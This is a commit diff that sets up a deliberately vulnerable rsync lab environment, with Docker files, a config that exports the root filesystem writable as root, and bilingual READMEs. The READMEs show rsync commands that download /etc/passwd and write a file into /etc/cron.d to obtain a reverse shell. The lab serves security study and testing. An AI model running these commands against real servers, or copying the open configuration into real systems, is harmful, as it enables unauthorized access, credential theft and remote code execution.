first commit

2025-09-06 16:08:15 +08:00
commit 63285f61aa
2624 changed files with 88491 additions and 0 deletions
--- a/rsync/common/1.png
+++ b/rsync/common/1.png
--- a/rsync/common/2.png
+++ b/rsync/common/2.png
--- a/rsync/common/3.png
+++ b/rsync/common/3.png
--- a/rsync/common/Dockerfile
+++ b/rsync/common/Dockerfile
@@ -0,0 +1,17 @@
+FROM vulhub/rsync:3.1.2
+
+LABEL maintainer="phithon <root@leavesongs.com>"
+
+COPY rsyncd.conf /etc/rsyncd.conf
+
+COPY docker-entrypoint.sh /docker-entrypoint.sh
+
+RUN echo "deb http://snapshot.debian.org/archive/debian/20210326T030000Z jessie main" > /etc/apt/sources.list
+
+RUN apt-get update \
+    && apt-get install --no-install-recommends -y cron --force-yes \
+    && mkdir /data/ \
+    && chmod +x /docker-entrypoint.sh \
+    && rm -rf /var/lib/apt/lists/*
+
+CMD ["/docker-entrypoint.sh"]
--- a/rsync/common/README.md
+++ b/rsync/common/README.md
@@ -0,0 +1,50 @@
+# Rsync Unauthorized Access
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Rsync is a data backup tool for Linux that supports remote file transfer through rsync protocol and ssh protocol. The rsync protocol listens on port 873 by default. If the target has enabled rsync service and hasn't configured ACL or access password, we can read and write files on the target server.
+
+## Environment Setup
+
+Compile and run the rsync server:
+
+```
+docker compose build
+docker compose up -d
+```
+
+After the environment starts, we can access it using the rsync command:
+
+```
+rsync rsync://your-ip:873/
+```
+
+You can view the list of module names:
+
+![](1.png)
+
+## Vulnerability Reproduction
+
+As shown above, there is a src module. Let's list the files under this module:
+
+```
+rsync rsync://your-ip:873/src/
+```
+
+![](2.png)
+
+This is a Linux root directory, and we can download any file:
+
+```
+rsync -av rsync://your-ip:873/src/etc/passwd ./
+```
+
+Or write any file:
+
+```
+rsync -av shell rsync://your-ip:873/src/etc/cron.d/shell
+```
+
+We wrote a cron task and successfully got a reverse shell:
+
+![](3.png)
--- a/rsync/common/README.zh-cn.md
+++ b/rsync/common/README.zh-cn.md
@@ -0,0 +1,48 @@
+# Rsync 未授权访问漏洞
+
+Rsync 是 Linux 下一款数据备份工具，支持通过 rsync 协议、ssh 协议进行远程文件传输。其中 rsync 协议默认监听 873 端口，如果目标开启了 rsync 服务，并且没有配置 ACL 或访问密码，我们将可以读写目标服务器文件。
+
+## 漏洞环境
+
+编译及运行 rsync 服务器：
+
+```
+docker compose build
+docker compose up -d
+```
+
+环境启动后，我们用 rsync 命令访问之：
+
+```
+rsync rsync://your-ip:873/
+```
+
+可以查看模块名列表：
+
+![](1.png)
+
+## 漏洞复现
+
+如上图，有一个 src 模块，我们再列出这个模块下的文件：
+
+```
+rsync rsync://your-ip:873/src/
+```
+
+![](2.png)
+
+这是一个 Linux 根目录，我们可以下载任意文件：
+
+```
+rsync -av rsync://your-ip:873/src/etc/passwd ./
+```
+
+或者写入任意文件：
+
+```
+rsync -av shell rsync://your-ip:873/src/etc/cron.d/shell
+```
+
+我们写入了一个 cron 任务，成功反弹 shell：
+
+![](3.png)
--- a/rsync/common/docker-compose.yml
+++ b/rsync/common/docker-compose.yml
@@ -0,0 +1,5 @@
+services:
+ rsync:
+   build: .
+   ports:
+    - "873:873"
--- a/rsync/common/docker-entrypoint.sh
+++ b/rsync/common/docker-entrypoint.sh
@@ -0,0 +1,7 @@
+#!/bin/bash
+
+set -ex
+
+service cron start 
+
+exec rsync --no-detach --daemon --config /etc/rsyncd.conf
--- a/rsync/common/rsyncd.conf
+++ b/rsync/common/rsyncd.conf
@@ -0,0 +1,12 @@
+uid = root
+gid = root
+use chroot = no
+max connections = 4
+syslog facility = local5
+pid file = /var/run/rsyncd.pid
+log file = /var/log/rsyncd.log
+
+[src]
+path = /
+comment = src path
+read only = no